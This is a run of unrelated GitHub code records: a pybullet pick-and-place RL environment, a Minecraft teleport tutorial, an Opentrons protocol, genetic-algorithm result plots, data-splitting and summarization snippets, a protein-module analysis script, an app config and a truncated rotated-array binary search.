xyz_to_pix(desired_position,BOUNDS,PIXEL_SIZE)\n desired_action = [desired_primitive]+desired_position[:2]\n else:\n desired_position = last_pos[self.task.config['pick'][self.task.goals[0]]]\n desired_position = xyz_to_pix(desired_position,BOUNDS,PIXEL_SIZE)\n desired_action = [desired_primitive]+desired_position[:2]\n y = self.last_pick_success\n print(\"desired_action\",desired_action)\n cross_ent = y*np.log(action[0]+0.001)+(1-y)*np.log(1-action[0]+0.001)\n phase_loss = -cross_ent*phase_penalty\n 
phase_loss = np.clip(phase_loss,0, phase_penalty)\n reward -= phase_loss\n print(\"phase_loss\",phase_loss)\n dis_loss = 0\n if (action[0] > 0.5)== self.last_pick_success:\n dis = np.linalg.norm(action[1:]-desired_action[1:])\n dis_loss = 0.25*3/(0.5*dis+3)\n reward += dis_loss\n print(\"dis_reward\",dis_loss) \n done = (self.step_count >= self.max_steps)\n _reward,_done = self.task.get_reward(self)\n reward += _reward\n done |= _done\n return reward,done\n def get_expert_demonstration(self):\n print(\"get_expert_demonstration\")\n print(self.observation)\n object_in_hand = self.observation['object_in_hand'][0]\n obj_pos = self.observation['image']\n goals = self.observation['lang_goal']\n if object_in_hand:\n desired_position = obj_pos[6+2*goals[1]:8+2*goals[1]]\n desired_action = [1]+desired_position[:2]\n else:\n desired_position = obj_pos[2*goals[0]:2*goals[0]+2]\n desired_action = [0]+desired_position[:2]\n print(\"desired_action\",desired_action)\n return desired_action\n \nclass SimplifyPickEnvWithoutLangReward(PickOrPlaceEnvWithoutLangReward):\n def __init__(self,render=False,multi_discrete=False,scale_obs=False):\n task = PickBlock\n super().__init__(task,render)\n \n obj_num = len(self.task.category_names)\n goal_num = 1\n self.scale_obs = scale_obs\n if not scale_obs:\n self.observation_space = spaces.Dict({\n \"image\": spaces.Box(0, self.image_size[0], (obj_num*2,), dtype=np.int32),\n \"lang_goal\": spaces.Box(0, obj_num, (goal_num,), dtype=np.int32),\n \"object_in_hand\": spaces.Box(0, 1, (1,), dtype=np.bool8),\n })\n else:\n self.observation_space = spaces.Dict({\n \"image\": spaces.Box(0, 1, (obj_num*2,), dtype=np.float32),\n \"lang_goal\": spaces.Box(0, obj_num, (goal_num,), dtype=np.int32),\n \"object_in_hand\": spaces.Box(0, 1, (1,), dtype=np.bool8),\n })\n # self.observation_space = spaces.Dict({\"image\":spaces.Box(0, 1, image_size + (4,), dtype=np.float32)})\n # self.action_space = spaces.Box(low=np.array([0, 0, 0]),high=np.array([1, 1, 1]),dtype=np.float32)\n if not multi_discrete:\n self.action_space = spaces.Box(low=np.array([0, 0, 0]),high=np.array([1, self.image_size[0], self.image_size[1]]),dtype=np.float32)\n else:\n self.action_space = spaces.MultiDiscrete([1, self.image_size[0], self.image_size[1]])\n self.max_steps = 10\n\n\n def get_observation(self,pick_success=0):\n\n pos = {}\n for key in self.obj_name_to_id.keys():\n pos[key] = pybullet.getBasePositionAndOrientation(self.obj_name_to_id[key])[0]\n self.info[\"obj_position\"].append(pos)\n pos_list = []\n for key in self.task.config['pick']:\n pos_list += xyz_to_pix(pos[key],BOUNDS,PIXEL_SIZE)\n # for key in self.task.config['place']:\n # pos_list += xyz_to_pix(pos[key],BOUNDS,PIXEL_SIZE)\n \n # print(\"task config\",self.task.config)\n obs = super().super_get_observation()\n #\"image\" \"depth\" \"xyzmap\" \"lang_goal\"\n self.last_observation = obs\n observation = {} # image(RGBD) lang_goal(encoded) object_in_hand(bool)\n if not self.scale_obs:\n observation['image'] = pos_list\n else:\n observation['image'] = np.array(pos_list)/self.image_size[0]\n #pesudo image with position sequence\n observation['object_in_hand'] = np.array([pick_success])\n lang_goal = self.task.goals\n observation['lang_goal'] = lang_goal\n self.observation = observation\n return observation\n\n # clip_image.show()\n # print(\"lang_goal\",observation['lang_goal'].dtype)\n def get_reward(self,observation,action,pos,last_pos):\n phase_penalty = 0.25\n damage_penalty = 0.25\n done = False\n time_penalty = -0.1\n reward = 0\n 
desired_primitive = self.last_pick_success\n if self.last_pick_success:\n desired_position = [0,0]\n desired_position = xyz_to_pix(desired_position,BOUNDS,PIXEL_SIZE)\n desired_action = [desired_primitive]+desired_position[:2]\n else:\n desired_position = last_pos[self.task.config['pick'][self.task.goals[0]]]\n desired_position = xyz_to_pix(desired_position,BOUNDS,PIXEL_SIZE)\n desired_action = [desired_primitive]+desired_position[:2]\n y = self.last_pick_success\n print(\"desired_action\",desired_action)\n cross_ent = y*np.log(action[0]+0.001)+(1-y)*np.log(1-action[0]+0.001)\n phase_loss = -cross_ent*phase_penalty\n phase_loss = np.clip(phase_loss,0, phase_penalty)\n reward -= phase_loss\n print(\"phase_loss\",phase_loss)\n dis_loss = 0\n if (action[0] < 0.5) and ( not self.last_pick_success):\n dis = np.linalg.norm(action[1:]-desired_action[1:])\n # dis_loss = 0.25*3/(0.5*dis+3)\n thre = 50\n dis_loss = - (dis/thre,1)[dis>thre]**2*0.25\n reward += dis_loss\n print(\"dis_reward\",dis_loss) \n done = (self.step_count >= self.max_steps)\n _reward,_done = self.task.get_reward(self)\n if _done:\n self.success = True\n else:\n self.success = False\n reward += _reward\n done |= _done\n return reward,done\n def get_expert_demonstration(self):\n print(\"get_expert_demonstration\")\n print(self.observation)\n object_in_hand = self.observation['object_in_hand'][0]\n obj_pos = self.observation['image']\n goals = self.observation['lang_goal']\n if object_in_hand:\n desired_position = obj_pos[6+2*goals[1]:8+2*goals[1]]\n desired_action = [1] + np.random.randint(0,self.image_size[0],(2,))\n else:\n desired_position = obj_pos[2*goals[0]:2*goals[0]+2]\n desired_action = [0] + desired_position[:2]\n print(\"desired_action\",desired_action)\n return desired_action\n def get_info(self):\n\n info = { \n 'success':self.success\n }\n if 'TimeLimit.truncated' in self.info.keys():\n info['TimeLimit.truncated'] = self.info['TimeLimit.truncated']\n # self.info = {}\n return info","repo_name":"runyuma/RA","sub_path":"environments/rl_environment.py","file_name":"rl_environment.py","file_ext":"py","file_size_in_byte":27160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34327370348","text":"'''\nPurpose: Teleports a player to different locations.\n Demonstrates usage of setTilePos and time.sleep\nFile Name: tour.py\nAuthor: Khamani Williams\nDated: 6/12/2017\n'''\nimport time \nfrom mcpi.minecraft import Minecraft\n\n# Connect to Minecraft\nmc = Minecraft.create()\n#set co-ordinates x,y,z\noriginal_x = 10\noriginal_y = 0\noriginal_z = -12\n# Change the player's position (teleport)\nmc.player.setTilePos(original_x, original_y, original_z)\ntime.sleep(3)\n\n#teleport 125 times, every 200 milliseconds\nfor i in range (1,125):\n x = 5*i\n y = 110\n z = -12\n mc.player.setTilePos(x, y, z)\n time.sleep(0.2)\n#end of for loop\n\n#set player position back to original position\nx = original_x\ny = original_y\nz = original_z\nmc.player.setTilePos(x, y, z)\ntime.sleep(3)\n\n#end of the program\n","repo_name":"creamreaper/minecraft-learning","sub_path":"chapter3.py","file_name":"chapter3.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40699975048","text":"from opentrons import protocol_api\n\n# metadata\nmetadata = {\n 'protocolName': 'My Protocol',\n 'author': 'Name ',\n 'description': 'Simple protocol to get started using OT2',\n 'apiLevel': '2.8'\n}\n\n# 
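every Opentrons protocol must define a run() function that accepts a\n# ProtocolContext; the apiLevel in the metadata dict selects the API behavior.\n#\n# 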
protocol run function. the part after the colon lets your editor know\n# where to look for autocomplete suggestions\ndef run(protocol: protocol_api.ProtocolContext):\n\n # labware\n plate = protocol.load_labware('corning_96_wellplate_360ul_flat', '3')\n tiprack = protocol.load_labware('opentrons_96_filtertiprack_200ul', '1')\n reservoir = protocol.load_labware('nest_12_reservoir_15ml', '2')\n \n # pipettes\n p300_multi = protocol.load_instrument('p300_multi_gen2', 'left', tip_racks=[tiprack])\n\n\n # commands\n # for i in range(3):\n # p300_multi.distribute(100, reservoir.wells()[i], plate.columns()[i])\n\n # loop of 12\n for i in range(12):\n p300_multi.distribute(100, reservoir.wells()[i], plate.columns()[i])\n\n # loop of 8\n # for i in range(8):\n # p20_multi.distribute(1, reservoir.wells()[i], plate.columns()[i])","repo_name":"zahmeeth/LDRD-SDL-ANL_Git","sub_path":"446_multi_20_nest_batch_1_E.coli.py","file_name":"446_multi_20_nest_batch_1_E.coli.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34446171679","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\ndef group_merge(group_name: str):\n \"\"\"\n Merges all .csv under the same group name into a pd.DataFrame\n\n :param group_name: group name of the files to be merged\n :return: Returns a df with all fitness values of an experiment group\n \"\"\"\n files = []\n for i in range(10):\n f_name = group_name + f'_{i+1}.csv'\n files.append(pd.read_csv(f_name, header=None))\n return pd.concat(files, axis=0)\n\n\nif __name__ == '__main__':\n # SELECTION COMPARISON PLOT\n selection_fps = group_merge('selection_test_fps')\n selection_fps.reset_index(inplace=True)\n selection_fps.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n selection_fps['generation'] = selection_fps['generation'].apply(lambda x: x + 1)\n selection_fps['selection'] = 'fps'\n\n selection_ranking = group_merge('selection_test_ranking')\n selection_ranking.reset_index(inplace=True)\n selection_ranking.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n selection_ranking['generation'] = selection_ranking['generation'].apply(lambda x: x + 1)\n selection_ranking['selection'] = 'ranking'\n\n selection_tournament = group_merge('selection_test_tournament')\n selection_tournament.reset_index(inplace=True)\n selection_tournament.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n selection_tournament['generation'] = selection_tournament['generation'].apply(lambda x: x + 1)\n selection_tournament['selection'] = 'tournament'\n\n df_selection = pd.concat([selection_fps, selection_ranking, selection_tournament])\n df_selection.sort_values(by='generation', inplace=True)\n df_selection.reset_index(drop=True, inplace=True)\n\n sns.lineplot(x='generation', y='fitness', hue='selection', palette='viridis', data=df_selection)\n plt.title('Fitness Landscape')\n plt.xlabel('Generations')\n plt.xticks(range(0, 101, 10))\n plt.ylabel('Best Fitness')\n plt.yticks(range(0, 101, 10))\n plt.legend().set_title(None)\n plt.show()\n\n # CROSSOVER COMPARISON PLOT\n crossover_opco = group_merge('crossover_test_tournament_opco')\n crossover_opco.reset_index(inplace=True)\n crossover_opco.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n crossover_opco['generation'] = crossover_opco['generation'].apply(lambda x: x + 1)\n crossover_opco['crossover'] = 'opco'\n\n crossover_tpco = 
selection_tournament.copy()\n crossover_tpco['selection'] = crossover_tpco['selection'].apply(lambda x: 'tpco')\n crossover_tpco.rename(columns={'selection': 'crossover'}, inplace=True)\n\n crossover_f_co = group_merge('crossover_test_tournament_f_co')\n crossover_f_co.reset_index(inplace=True)\n crossover_f_co.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n crossover_f_co['generation'] = crossover_f_co['generation'].apply(lambda x: x + 1)\n crossover_f_co['crossover'] = 'f_co'\n\n df_crossover = pd.concat([crossover_opco, crossover_tpco, crossover_f_co])\n df_crossover.sort_values(by='generation', inplace=True)\n df_crossover.reset_index(drop=True, inplace=True)\n\n sns.lineplot(x='generation', y='fitness', hue='crossover', palette='viridis', data=df_crossover)\n plt.title('Fitness Landscape')\n plt.xlabel('Generations')\n plt.xticks(range(0, 101, 10))\n plt.ylabel('Best Fitness')\n plt.yticks(range(0, 66, 5))\n plt.legend().set_title(None)\n plt.show()\n\n # MUTATION COMPARISON PLOT\n mutation_2pm = group_merge('mutation_test_tournament_2pm')\n mutation_2pm.reset_index(inplace=True)\n mutation_2pm.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n mutation_2pm['generation'] = mutation_2pm['generation'].apply(lambda x: x + 1)\n mutation_2pm['mutation'] = '2pm'\n\n mutation_3pm = group_merge('mutation_test_tournament_3pm')\n mutation_3pm.reset_index(inplace=True)\n mutation_3pm.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n mutation_3pm['generation'] = mutation_3pm['generation'].apply(lambda x: x + 1)\n mutation_3pm['mutation'] = '3pm'\n\n mutation_swap = group_merge('mutation_test_tournament_swap')\n mutation_swap.reset_index(inplace=True)\n mutation_swap.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n mutation_swap['generation'] = mutation_swap['generation'].apply(lambda x: x + 1)\n mutation_swap['mutation'] = 'swap'\n\n mutation_2swap = group_merge('mutation_test_tournament_2swap')\n mutation_2swap.reset_index(inplace=True)\n mutation_2swap.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n mutation_2swap['generation'] = mutation_2swap['generation'].apply(lambda x: x + 1)\n mutation_2swap['mutation'] = '2swap'\n\n mutation_inner_swap = group_merge('mutation_test_tournament_inner_swap')\n mutation_inner_swap.reset_index(inplace=True)\n mutation_inner_swap.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n mutation_inner_swap['generation'] = mutation_inner_swap['generation'].apply(lambda x: x + 1)\n mutation_inner_swap['mutation'] = 'inner_swap'\n\n mutation_rand_mut = group_merge('mutation_test_tournament_rand_mut')\n mutation_rand_mut.reset_index(inplace=True)\n mutation_rand_mut.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n mutation_rand_mut['generation'] = mutation_rand_mut['generation'].apply(lambda x: x + 1)\n mutation_rand_mut['mutation'] = 'rand_mut'\n\n df_mutation = pd.concat([mutation_2pm, mutation_3pm, mutation_swap, mutation_2swap, mutation_inner_swap, mutation_rand_mut])\n df_mutation.sort_values(by='generation', inplace=True)\n df_mutation.reset_index(drop=True, inplace=True)\n\n sns.lineplot(x='generation', y='fitness', hue='mutation', palette='viridis', data=df_mutation)\n plt.title('Fitness Landscape')\n plt.xlabel('Generations')\n plt.xticks(range(0, 101, 10))\n plt.ylabel('Best Fitness')\n plt.yticks(range(0, 66, 5))\n plt.legend().set_title(None)\n plt.show()\n\n # EASY PUZZLE COMPARISON PLOT\n easy_opco = 
group_merge('easy_test_opco')\n easy_opco.reset_index(inplace=True)\n easy_opco.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n easy_opco['generation'] = easy_opco['generation'].apply(lambda x: x + 1)\n easy_opco['crossover'] = 'opco'\n\n easy_tpco = group_merge('easy_test_tpco')\n easy_tpco.reset_index(inplace=True)\n easy_tpco.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n easy_tpco['generation'] = easy_tpco['generation'].apply(lambda x: x + 1)\n easy_tpco['crossover'] = 'tpco'\n\n easy_f_co = group_merge('easy_test_f_co')\n easy_f_co.reset_index(inplace=True)\n easy_f_co.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n easy_f_co['generation'] = easy_f_co['generation'].apply(lambda x: x + 1)\n easy_f_co['crossover'] = 'f_co'\n\n easy_opco_rand_mut = group_merge('easy_test_opco_rand_mut')\n easy_opco_rand_mut.reset_index(inplace=True)\n easy_opco_rand_mut.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n easy_opco_rand_mut['generation'] = easy_opco_rand_mut['generation'].apply(lambda x: x + 1)\n easy_opco_rand_mut['crossover'] = 'opco + rand_mut'\n\n df_easy = pd.concat([easy_opco, easy_tpco, easy_f_co, easy_opco_rand_mut])\n df_easy.sort_values(by='generation', inplace=True)\n df_easy.reset_index(drop=True, inplace=True)\n df_easy['fitness'] = df_easy['fitness'].apply(lambda x: str(x).split(';;;;')[0]).astype('int')\n\n sns.lineplot(x='generation', y='fitness', hue='crossover', palette='viridis', data=df_easy)\n plt.title('Fitness Landscape')\n plt.xlabel('Generations')\n plt.xticks(range(0, 101, 10))\n plt.ylabel('Best Fitness')\n plt.yticks(range(0, 51, 5))\n plt.axhline(y=0.0, color='black', linestyle='dotted')\n plt.legend().set_title(None)\n plt.show()\n\n # VERY HARD PUZZLE PLOTS\n # fitness crossover\n very_hard_opco = group_merge('very_hard_test_opco')\n very_hard_opco.reset_index(inplace=True)\n very_hard_opco.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n very_hard_opco['generation'] = very_hard_opco['generation'].apply(lambda x: x + 1)\n very_hard_opco['crossover'] = 'opco'\n df_very_hard_opco = very_hard_opco.copy()\n df_very_hard_opco.sort_values(by='generation', inplace=True)\n df_very_hard_opco.reset_index(drop=True, inplace=True)\n\n sns.lineplot(x='generation', y='fitness', palette='viridis', data=df_very_hard_opco)\n plt.title('Fitness Landscape')\n plt.xlabel('Generations')\n plt.xticks(range(0, 201, 20))\n plt.ylabel('Best Fitness')\n plt.yticks(range(0, 61, 5))\n plt.axhline(y=15.0, color='black', linestyle='dotted')\n plt.show()\n\n # average fitness function\n very_hard_avg = group_merge('very_hard_test_opco_avg')\n very_hard_avg.reset_index(inplace=True)\n very_hard_avg.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n very_hard_avg['generation'] = very_hard_avg['generation'].apply(lambda x: x + 1)\n very_hard_avg['function'] = 'avg'\n df_very_hard_avg = very_hard_avg.copy()\n df_very_hard_avg.sort_values(by='generation', inplace=True)\n df_very_hard_avg.reset_index(drop=True, inplace=True)\n\n sns.lineplot(x='generation', y='fitness', palette='viridis', data=df_very_hard_avg)\n plt.title('Fitness Landscape')\n plt.xlabel('Generations')\n plt.xticks(range(0, 201, 20))\n plt.ylabel('Average Best Fitness')\n plt.yticks(range(0, 21, 2))\n plt.axhline(y=4.0, color='black', linestyle='dotted')\n plt.show()\n\n # final attempt\n very_hard = group_merge('very_hard_test_opco_avg_500')\n very_hard.reset_index(inplace=True)\n 
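# same reshaping boilerplate as the earlier blocks: promote the index to a\n    # 1-based 'generation' column before plotting\n    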
very_hard.rename(columns={'index': 'generation', 0: 'fitness'}, inplace=True)\n very_hard['generation'] = very_hard['generation'].apply(lambda x: x + 1)\n very_hard['function'] = 'avg'\n df_very_hard = very_hard.copy()\n df_very_hard.sort_values(by='generation', inplace=True)\n df_very_hard.reset_index(drop=True, inplace=True)\n\n sns.lineplot(x='generation', y='fitness', palette='viridis', data=df_very_hard)\n plt.title('Fitness Landscape')\n plt.xlabel('Generations')\n plt.xticks(range(0, 501, 50))\n plt.ylabel('Average Best Fitness')\n plt.yticks(range(0, 21, 2))\n plt.axhline(y=1.0, color='black', linestyle='dotted')\n plt.show()\n","repo_name":"migbernardo/cifo_project","sub_path":"results/stats_analysis.py","file_name":"stats_analysis.py","file_ext":"py","file_size_in_byte":10456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14420434313","text":"import json\nimport math\n\nPORCENTAJE_DE_TEST = 0.1\n\n\ndef crear_archivos_de_entrenamiento_y_test_desde(nombre_archivo):\n archivo = open('datos/%s.json' % nombre_archivo)\n datos_txt = json.load(archivo)\n archivo.close()\n\n mensajes_totales = len(datos_txt)\n indice_de_corte = int(math.floor(mensajes_totales * (1.0 - PORCENTAJE_DE_TEST)))\n parte_de_entrenamiento = datos_txt[:indice_de_corte]\n parte_de_test = datos_txt[indice_de_corte:]\n\n file_entrenamiento = open('datos/%s_entrenamiento.json' % nombre_archivo, 'w')\n json.dump(parte_de_entrenamiento, file_entrenamiento)\n file_entrenamiento.close()\n\n file_test = open('datos/%s_test.json' % nombre_archivo, 'w')\n json.dump(parte_de_test, file_test)\n file_test.close()\n\nif __name__ == \"__main__\":\n crear_archivos_de_entrenamiento_y_test_desde('ham_dev')\n crear_archivos_de_entrenamiento_y_test_desde('spam_dev')\n","repo_name":"martinrey/machine-learning","sub_path":"tp1/cortar_archivos_json.py","file_name":"cortar_archivos_json.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34498448969","text":"#!/bin/python3\n\nimport argparse\nfrom pathlib import Path\n\n\n#==============================================================================\n# Read files\n#==============================================================================\n\ndef read_csv(csv_fn) -> dict:\n \"\"\" \n Read csv file \n format : gene,ppi_gain,ppi_lost,mod_gain,mod_lost\n return dict \n {gene : ppi_gain, ppi_lost, mod_gain, mod_lost}\n \"\"\"\n dict_gene_association = {}\n with open(csv_fn) as csv_file:\n for line in csv_file:\n if \"gene\" in line:\n continue\n else:\n splited_line = line.replace(\"\\n\",\"\").split(\",\")\n gene = splited_line[0]\n ppi_gain_list = [i.split(\"_\")[1] for i in splited_line[1].split(\"|\") if len(i) > 1]\n ppi_lost_list = [i.split(\"_\")[1] for i in splited_line[2].split(\"|\") if len(i) > 1]\n mod_gain_list = [i for i in splited_line[3].split(\"|\") if len(i) > 1]\n mod_lost_list = [i for i in splited_line[4].split(\"|\") if len(i) > 1]\n dict_gene_association[gene] = [ppi_gain_list, ppi_lost_list, mod_gain_list, mod_lost_list]\n return dict_gene_association\n\ndef co_appeared(dict_gene_association) -> dict:\n \"\"\"\n Filter the gene association dict\n Keep only gene/association where at least 1 module and 1 ppi are gained\n Return subdict with same format\n \"\"\"\n return {\n gene : association \n for gene, association in dict_gene_association.items()\n if len(association[0]) > 0 and len(association[2]) 
> 0\n }\n\ndef load_domains_from_csv(domains_file) -> dict:\n \"\"\"\n Load the domains coordinates from a csv file\n csv file is : geneName (no node ID), domainsName, start, stop\n Return a dict\n { gene : [ domain_dict list ] }\n A domain of the domain_dict list is :\n { domain_name : [ start, end ]}\n \"\"\"\n # Init the dict\n dict_gene_domainsList = {}\n # Open and read line per line the input csv_file\n with open(domains_file, \"r\") as csv_file:\n # Iterate on csv file\n for line in csv_file:\n # Split the line\n splited_line = line.replace(\"\\n\", \"\").split(\",\")\n g_name, d_name, d_start, d_end = splited_line[0], splited_line[1], splited_line[2], splited_line[3]\n # Get the gene name with node id, from the raw gene name of the csv file (nod node id)\n gene = g_name.split(\"_\")[0]\n # Build the domains dict (1 csv line = 1 domain = 1 dict)\n dict_domain_posList = {f\"{d_name}|{d_start}|{d_end}\" : [d_start, d_end]}\n # Add it to the gene domains list dict\n if gene not in dict_gene_domainsList:\n dict_gene_domainsList[gene] = [dict_domain_posList]\n else:\n dict_gene_domainsList[gene].append(dict_domain_posList)\n # Return the dict\n return dict_gene_domainsList\n\ndef get_fasta_from_file(multi_fasta) -> dict:\n \"\"\"\n Read the multi fasta file\n And parse it to return a protein dict\n \"\"\"\n protein_dict = {}\n sequence = \"\"\n with open(multi_fasta, \"r\") as fasta_file:\n for line in fasta_file:\n t_line = line.replace(\"\\n\",\"\")\n if \">\" in t_line:\n if sequence != \"\":\n protein_dict[header.replace(\">\",\"\")] = sequence\n sequence = \"\"\n header = t_line\n else: sequence += t_line.replace(\"X\",\"A\")\n protein_dict[header.replace(\">\",\"\")] = sequence\n return protein_dict\n\ndef get_fasta_modules(module_dir) -> dict:\n \"\"\"\n Read all fasta of the module fastas directory\n module header e.g. 
B692|1248|1254|_NP001361725.1_214\n return dict {module : {gene : [start, stop] } }\n \"\"\"\n dict_module_genePos = {}\n for file in Path(module_dir).iterdir():\n if file.suffix == \".fasta\":\n dict_name_seq = get_fasta_from_file(file)\n dict_gene_Mpos = {}\n for header in dict_name_seq:\n gene = header.split(\"_\")[1]\n module = header.split(\"|\")[0]\n start = header.split(\"|\")[1]\n stop = header.split(\"|\")[2]\n dict_gene_Mpos[gene] = [start, stop]\n dict_module_genePos[module] = dict_gene_Mpos\n return dict_module_genePos\n\ndef region_domains_TS(dict_gene_domainsList) -> dict:\n \"\"\"\n Divide gene sequence by \"regions\", here based on domains\n {region : {gene : [start, stop] } }\n \"\"\"\n dict_region_genePos = {}\n for gene, domains_list in dict_gene_domainsList.items():\n for domain_info in domains_list:\n dict_gene_Dpos = {}\n for d, info in domain_info.items():\n domain = d.split(\"|\")[0]\n d_start = d.split(\"|\")[1]\n d_stop = d.split(\"|\")[2]\n dict_gene_Dpos[gene] = [d_start, d_stop] \n dict_region_genePos[domain] = dict_gene_Dpos\n return dict_region_genePos\n\n#==============================================================================\n# Modules by region/domains\n#==============================================================================\n\ndef modules_by_domains(module_list, dict_region_genePos, dict_module_genePos) -> dict:\n \"\"\"\n Associate modules with region they are localised in \n (If a modules, in 2 descendants is present in 2 different regions, we associate it with both)\n Return a dict \n { region : [module list] }\n \"\"\"\n dict_region_moduleList = {region : [] for region in dict_region_genePos}\n for region, gene_Rpos in dict_region_genePos.items():\n # By gene\n for gene, r_pos in gene_Rpos.items():\n r_start, r_stop = r_pos[0], r_pos[1]\n # Check for each module if its in this region\n for module in dict_module_genePos:\n m_info = dict_module_genePos[module]\n if gene in m_info:\n m_pos = dict_module_genePos[module][gene]\n m_start, m_stop = m_pos[0], m_pos[1]\n # If in it, add it to region\n if int(m_stop) >= int(r_start)-50 and int(r_stop)+50 >= int(m_start):\n if module not in dict_region_moduleList[region]:\n dict_region_moduleList[region].append(module)\n return dict_region_moduleList\n \n#==============================================================================\n# Argparse parser\n#==============================================================================\n\ndef parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"csv_file\",\n help = \"csv file containing the gene where modules and PPI co-appeared (format : gene,ppi_gain,ppi_lost,mod_gain,mod_lost, eg; G71_69_70,Q5XPI4_RNF123,,,B335|B1315)\",\n type=str)\n parser.add_argument(\"--domains_csv\",\n help = \"Add an domains csv file, at the format : gene_name, domain_name, start, end\",\n type=str)\n parser.add_argument(\"module_directory\",\n help = \"directory containing fasta file for all our modules\",\n type=str)\n return parser.parse_args()\n\n\n\n#==============================================================================\n# Main\n#==============================================================================\n\ndef main():\n # Get arguments\n args = parser()\n csv_fn = Path(args.csv_file).resolve()\n module_dir = Path(args.module_directory).resolve()\n dict_gene_association = read_csv(csv_fn)\n dict_gene_domainsList = load_domains_from_csv(args.domains_csv) \n dict_module_genePos = get_fasta_modules(module_dir)\n dict_region_genePos = 
region_domains_TS(dict_gene_domainsList)\n \n \n print(f\"{len(dict_gene_association)} module(s)-PPI(s) associations\")\n dict_gene_association = co_appeared(dict_gene_association)\n print(f\"{len(dict_gene_association)} co-apparitions associations\")\n print(f\"{len([gene for gene in dict_gene_association if gene.startswith('G')])} co-apparitions associations at ancestral gene node\")\n \n\n\n # Count \n ppi_list = []\n for gene, coapp in dict_gene_association.items():\n if gene.startswith(\"G\"):\n for ppi in coapp[0]:\n if ppi not in ppi_list:\n ppi_list.append(ppi)\n print(f\"\\t{len(ppi_list)} PPI associated with module signatures\")\n mod_list = []\n for gene, coapp in dict_gene_association.items():\n if gene.startswith(\"G\"):\n for mod in coapp[2]:\n if mod not in mod_list:\n mod_list.append(mod)\n print(f\"\\t{len(mod_list)} modules present in these module signatures\")\n \n print(mod_list)\n dict_region_moduleList = modules_by_domains(mod_list, dict_region_genePos, dict_module_genePos)\n for r, ml in dict_region_moduleList.items():\n print(r, len(ml), ml)\n \n # Select ancestral\n dict_gene_association = {gene : assoc for gene, assoc in dict_gene_association.items() if gene.startswith(\"G\")}\n \n \n \n \nif __name__ == \"__main__\":\n main()","repo_name":"OcMalde/PhyloCharMod_publ","sub_path":"phylocharmod/modules_repartition.py","file_name":"modules_repartition.py","file_ext":"py","file_size_in_byte":9173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8621246228","text":"\n\nimport os\nfrom summarizer import Summarizer\ntext = open(f\"{os.getcwd()}/data/Chapter05/nlphistory.txt\").read()\n\nmodel = Summarizer()\n\nprint(\"Without Coreference:\")\nresult = model(text, min_length=200,ratio=0.01)\nfull = ''.join(result)\nprint(full)\n\n\n# print(\"With Coreference:\")\n# # handler = CoreferenceHandler(greedyness=.35)\n\n# model = Summarizer(sentence_handler=handler)\n# result = model(text, min_length=200,ratio=0.01)\n# full = ''.join(result)\n# print(full)","repo_name":"teresagarcia/PracticalNLP","sub_path":"Chapter07/03_p4_TextSummarization_BERT.py","file_name":"03_p4_TextSummarization_BERT.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15725732686","text":"from multiprocessing import cpu_count\nimport configs.logging\nimport configs.plexdictionary\n\nusers_db = 'configs/users.json'\n\nversion = '0.0.19'\napp_name = 'malproxy'\ndebug_mode = False\nport = 8181\n\n# GUnicorn configs\nworkers = cpu_count() * 2 + 1\nbind = \"0.0.0.0:\" + str(port)\n","repo_name":"Morsomnium/malproxy","sub_path":"configs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32701222479","text":"# import getpass\n\ndef binary_search_rotation(lo, hi, condition):\n while lo <= hi:\n mid = (lo+hi) // 2\n result = condition(mid)\n if result == 'found':\n return mid\n elif result == 'left':\n hi = mid - 1\n elif result == 'right':\n lo = mid + 1\n return -1\n\ndef count_rotations_generic(nums):\n hi = len(nums)-1\n lo = 0\n def condition(mid):\n nonlocal hi\n nonlocal lo\n # print(mid)\n # print(nums)\n \n # print(\"in here\")\n if mid > 0 and nums[mid] < nums[mid-1]:\n return \"found\"\n elif mid > 0 and nums[mid] >= nums[mid-1]:\n if nums[mid] < nums[hi]:\n hi = mid - 1\n return \"left\"\n else:\n lo = 
